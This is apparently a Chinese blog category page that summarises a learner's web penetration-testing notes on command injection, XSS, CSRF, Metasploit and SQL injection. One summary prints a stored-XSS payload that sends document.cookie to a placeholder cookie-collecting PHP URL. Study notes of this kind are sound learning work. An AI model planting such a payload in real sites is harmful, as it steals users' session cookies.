随笔 - 97  文章 - 0 评论 - 0 阅读 - 23644
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

随笔分类 -  渗透学习web

网安第五天(命令执行注入漏洞)
摘要:漏洞产生原因: 在web程序中,前端需要传递参数来让后端执行(特别是一些网络设备的web管理界面),攻击者可以构造一些额外的“带有非法目的”命令传入,欺骗后台服务器执行。 如果web应用使用的是root权限,那么该漏洞可以导致攻击者在服务器上执行任意命令 代码执行与命令执行函数: php中代码执行& 阅读全文
posted @ 2021-04-28 21:30 EndlessShw 阅读(109) 评论(0) 推荐(0) 编辑
网安第四天(xss stored、CSRF)(不是连续的第四天(草
摘要:trim() //去除空格 mysql_real_escape_string() //转义防止sql注入 htmlspecialchars() //将特殊符号转义(默认不对单引号进行处理) strip_tags() //过滤字符串中的HTML标签 CSRF(Cross-Site Request Fo 阅读全文
posted @ 2021-04-24 14:20 EndlessShw 阅读(43) 评论(0) 推荐(0) 编辑
第三天(metasploit利用
摘要:缓冲区溢出的基本知识点: https://xz.aliyun.com/t/3784 https://baijiahao.baidu.com/s?id=1668767940652851301&wfr=spider&for=pc 运行前的初始化: service postgresql start //运 阅读全文
posted @ 2021-04-18 21:35 EndlessShw 阅读(54) 评论(0) 推荐(0) 编辑
网安第二天(xss
摘要:Javascript总体概述: js是指在网页上编写的脚本语言,是对HTML在功能上的扩展 js代码嵌入在HTML里,在客户端的浏览器上执行,属于前端语言 document是个对象,是指当前网页 .write()指属性,将内容写入网页中 加载外部js文件: <script src="/js/test 阅读全文
posted @ 2021-04-18 10:47 EndlessShw 阅读(29) 评论(0) 推荐(0) 编辑
第三天随笔(xss存储型
摘要:该代码为接受cookie的php网页 盗取cookie的xss语句: <script>document.write('<img src="接受cookie的php的URL(以.php结尾)?cookie='+document.cookie+'" width=0 height=0 border=0 / 阅读全文
posted @ 2021-04-18 10:45 EndlessShw 阅读(49) 评论(0) 推荐(0) 编辑
第一天(永远都是第一天(笑
摘要:1.数字型注入和字符型注入: 区别在于where $id=id 还是‘id’(也可以是其他闭合)。数字型的会直接将代码执行,而字符型会将其当作字符串对比,所以需要闭合注释。 2. php的一些函数: 3.php的一些注意事项: 4.mysql的模糊查询(搜索型注入): %代表任意数量的字符(相当于正 阅读全文
posted @ 2021-04-13 23:46 EndlessShw 阅读(61) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示